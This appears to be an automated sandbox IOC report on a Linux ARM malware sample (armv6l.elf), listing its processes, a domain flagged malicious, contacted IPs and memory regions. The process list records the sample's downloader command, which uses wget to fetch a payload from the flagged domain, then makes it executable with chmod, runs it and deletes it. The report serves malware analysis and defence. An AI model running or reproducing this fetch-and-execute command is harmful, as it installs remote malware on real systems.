IOC Report
armv6l.elf

loading gif

Processes

Path
Cmdline
Malicious
/tmp/armv6l.elf
/tmp/armv6l.elf
/tmp/armv6l.elf
-
/bin/sh
/bin/sh -c "wget -q http://gay.energy/.../vivid -O .....;chmod 777 .....;./.....;rm -rf ....."
/bin/sh
-
/usr/bin/wget
wget -q http://gay.energy/.../vivid -O .....
/bin/sh
-
/usr/bin/chmod
chmod 777 .....
/bin/sh
-
/bin/sh
/bin/sh ./.....
/bin/sh
-
/usr/bin/rm
rm -rf .....
/tmp/armv6l.elf
-
/tmp/armv6l.elf
-
/tmp/armv6l.elf
-
/usr/bin/dash
-
/usr/bin/rm
rm -f /tmp/tmp.nheCLXpZ5L /tmp/tmp.Ex8IQ1Qf5g /tmp/tmp.vb1R40Ge55
/usr/bin/dash
-
/usr/bin/cat
cat /tmp/tmp.nheCLXpZ5L
/usr/bin/dash
-
/usr/bin/head
head -n 10
/usr/bin/dash
-
/usr/bin/tr
tr -d \\000-\\011\\013\\014\\016-\\037
/usr/bin/dash
-
/usr/bin/cut
cut -c -80
/usr/bin/dash
-
/usr/bin/cat
cat /tmp/tmp.nheCLXpZ5L
/usr/bin/dash
-
/usr/bin/head
head -n 10
/usr/bin/dash
-
/usr/bin/tr
tr -d \\000-\\011\\013\\014\\016-\\037
/usr/bin/dash
-
/usr/bin/cut
cut -c -80
/usr/bin/dash
-
/usr/bin/rm
rm -f /tmp/tmp.nheCLXpZ5L /tmp/tmp.Ex8IQ1Qf5g /tmp/tmp.vb1R40Ge55
There are 24 hidden processes, click here to show them.

Domains

Name
IP
Malicious
gay.energy
unknown
malicious

IPs

IP
Domain
Country
Malicious
54.171.230.55
unknown
United States
92.60.77.69
unknown
Italy
109.202.202.202
unknown
Switzerland
91.189.91.43
unknown
United Kingdom
91.189.91.42
unknown
United Kingdom

Memdumps

Base Address
Regiontype
Protect
Malicious
7f0cbc031000
page execute read
malicious
7f0cbc031000
page execute read
malicious
7f0cbc031000
page execute read
malicious
7ffc5c6e8000
page read and write
7f0dc3808000
page read and write
558ea6ac4000
page read and write
7f0dc3124000
page read and write
7f0dc2ac5000
page read and write
7f0dc3808000
page read and write
7f0dbc021000
page read and write
7f0cbc040000
page read and write
7f0dbbfff000
page read and write
7f0dc2b57000
page read and write
558ea8acb000
page execute and read and write
558ea8ae2000
page read and write
7f0dc3495000
page read and write
7ffc5c720000
page execute read
7f0dc22bd000
page read and write
558ea6873000
page execute read
7f0dc3495000
page read and write
558ea8acb000
page execute and read and write
7f0dc3495000
page read and write
558ea6873000
page execute read
558ea6acd000
page read and write
7f0dc2b57000
page read and write
7f0cbc039000
page read and write
7f0cbc040000
page read and write
7f0dc3676000
page read and write
7f0cbc039000
page read and write
7f0dc3147000
page read and write
7f0dc37c3000
page read and write
558eaa7f3000
page read and write
558ea6acd000
page read and write
558eaa7f3000
page read and write
7ffc5c720000
page execute read
558ea6ac4000
page read and write
7f0dc3676000
page read and write
558ea6acd000
page read and write
7f0cbc039000
page read and write
7f0dc3676000
page read and write
7ffc5c6e8000
page read and write
7ffc5c720000
page execute read
558ea8ae2000
page read and write
7f0dc22bd000
page read and write
7f0dc32b3000
page read and write
7f0dbc021000
page read and write
7f0dc379f000
page read and write
7f0dc37c3000
page read and write
7f0dc2ac5000
page read and write
7f0dc32b3000
page read and write
558ea6ac4000
page read and write
7f0dbbfff000
page read and write
7f0dc3808000
page read and write
7ffc5c6e8000
page read and write
558ea8acb000
page execute and read and write
7f0dc2eb9000
page read and write
7f0cbc040000
page read and write
7f0dc2eb9000
page read and write
558eaa7f3000
page read and write
7f0dc379f000
page read and write
7f0dc22bd000
page read and write
7f0dc3124000
page read and write
7f0dc379f000
page read and write
7f0dc2b57000
page read and write
7f0dbbfff000
page read and write
7f0dc2ac5000
page read and write
7f0dc3124000
page read and write
558ea6873000
page execute read
7f0dc37c3000
page read and write
7f0dbc021000
page read and write
558ea8ae2000
page read and write
7f0dc2eb9000
page read and write
7f0dc3147000
page read and write
7f0dc3147000
page read and write
7f0dc32b3000
page read and write
There are 65 hidden memdumps, click here to show them.